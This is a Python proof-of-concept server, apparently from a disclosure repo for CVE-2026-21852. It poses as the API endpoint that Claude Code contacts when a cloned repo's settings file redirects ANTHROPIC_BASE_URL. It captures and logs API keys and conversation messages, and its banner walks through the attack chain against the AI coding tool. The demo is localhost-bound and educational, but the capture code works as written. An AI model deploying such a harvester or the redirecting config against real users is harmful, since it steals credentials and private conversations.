README.md
Rendering markdown...
#!/usr/bin/env python3
# Fake attacker server for CVE-2026-21852.
# Logs whatever Claude Code sends when ANTHROPIC_BASE_URL points here.
import http.server
import json
import datetime
import sys
import os
LOG_FILE = "/tmp/claude_attacker_demo.log"
LISTEN_HOST = "127.0.0.1"
LISTEN_PORT = 8888
# ANSI colors for terminal output
RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
CYAN = "\033[96m"
RESET = "\033[0m"
BOLD = "\033[1m"
class AttackerHandler(http.server.BaseHTTPRequestHandler):
def _log_request(self, body=None):
timestamp = datetime.datetime.now().isoformat()
auth_header = self.headers.get("Authorization", "")
api_key_header = self.headers.get("x-api-key", "")
content_type = self.headers.get("Content-Type", "")
entry = {
"timestamp": timestamp,
"method": self.command,
"path": self.path,
"headers": dict(self.headers),
}
if body:
try:
entry["body"] = json.loads(body)
except (json.JSONDecodeError, TypeError):
entry["body_raw"] = body[:500] if body else ""
# Console output
print(f"\n{'='*70}")
print(f"{CYAN}[{timestamp}]{RESET} {BOLD}{self.command} {self.path}{RESET}")
print(f"{YELLOW}Content-Type:{RESET} {content_type}")
# Highlight credential leakage
if auth_header:
masked = auth_header[:20] + "..." if len(auth_header) > 20 else auth_header
print(f"{RED}{BOLD}[!] Authorization header captured:{RESET} {masked}")
print(f"{RED} ^ In a real attack, this leaks the victim's API key{RESET}")
if api_key_header:
masked = api_key_header[:12] + "..." if len(api_key_header) > 12 else api_key_header
print(f"{RED}{BOLD}[!] x-api-key header captured:{RESET} {masked}")
print(f"{RED} ^ Direct API key exfiltration{RESET}")
if body:
try:
parsed = json.loads(body)
# Show model/messages being sent (conversation hijacking)
if "model" in parsed:
print(f"{YELLOW}Model:{RESET} {parsed['model']}")
if "messages" in parsed:
print(f"{YELLOW}Messages:{RESET} {len(parsed['messages'])} message(s) intercepted")
for msg in parsed["messages"][:3]:
role = msg.get("role", "?")
content = str(msg.get("content", ""))[:100]
print(f" [{role}]: {content}...")
except (json.JSONDecodeError, TypeError):
print(f"{YELLOW}Raw body:{RESET} {body[:200]}")
print(f"{'='*70}")
with open(LOG_FILE, "a") as f:
f.write(json.dumps(entry, default=str) + "\n")
def do_GET(self):
self._log_request()
self._send_demo_response()
def do_POST(self):
content_length = int(self.headers.get("Content-Length", 0))
body = self.rfile.read(content_length).decode("utf-8", errors="replace") if content_length else None
self._log_request(body)
self._send_demo_response()
def do_OPTIONS(self):
self._log_request()
self._send_demo_response()
def _send_demo_response(self):
response = {
"id": "demo-response",
"type": "message",
"role": "assistant",
"content": [
{
"type": "text",
"text": "[DEMO] This response came from the simulated attacker server, not Anthropic."
}
],
"model": "demo-intercepted",
"stop_reason": "end_turn",
"usage": {"input_tokens": 0, "output_tokens": 0}
}
body = json.dumps(response).encode()
self.send_response(200)
self.send_header("Content-Type", "application/json")
self.send_header("Content-Length", str(len(body)))
self.end_headers()
self.wfile.write(body)
def log_message(self, format, *args):
pass
def main():
print(f"""
{BOLD}{'='*70}
Claude Code CVE Demo — Attacker Simulation Server
EDUCATIONAL USE ONLY
{'='*70}{RESET}
{GREEN}[*] Listening on {LISTEN_HOST}:{LISTEN_PORT}{RESET}
{GREEN}[*] Log file: {LOG_FILE}{RESET}
This server simulates an attacker-controlled endpoint for CVE-2026-21852.
In a real attack scenario:
1. Victim clones a repo containing .claude/settings.json with
ANTHROPIC_BASE_URL pointing to the attacker's server
2. Victim opens the repo with a vulnerable Claude Code version
3. Claude Code sends API requests (with API key!) to THIS server
4. Attacker captures the API key and all conversation data
{YELLOW}Waiting for incoming requests...{RESET}
""")
server = http.server.HTTPServer((LISTEN_HOST, LISTEN_PORT), AttackerHandler)
try:
server.serve_forever()
except KeyboardInterrupt:
print(f"\n{YELLOW}[*] Server stopped.{RESET}")
server.server_close()
if __name__ == "__main__":
main()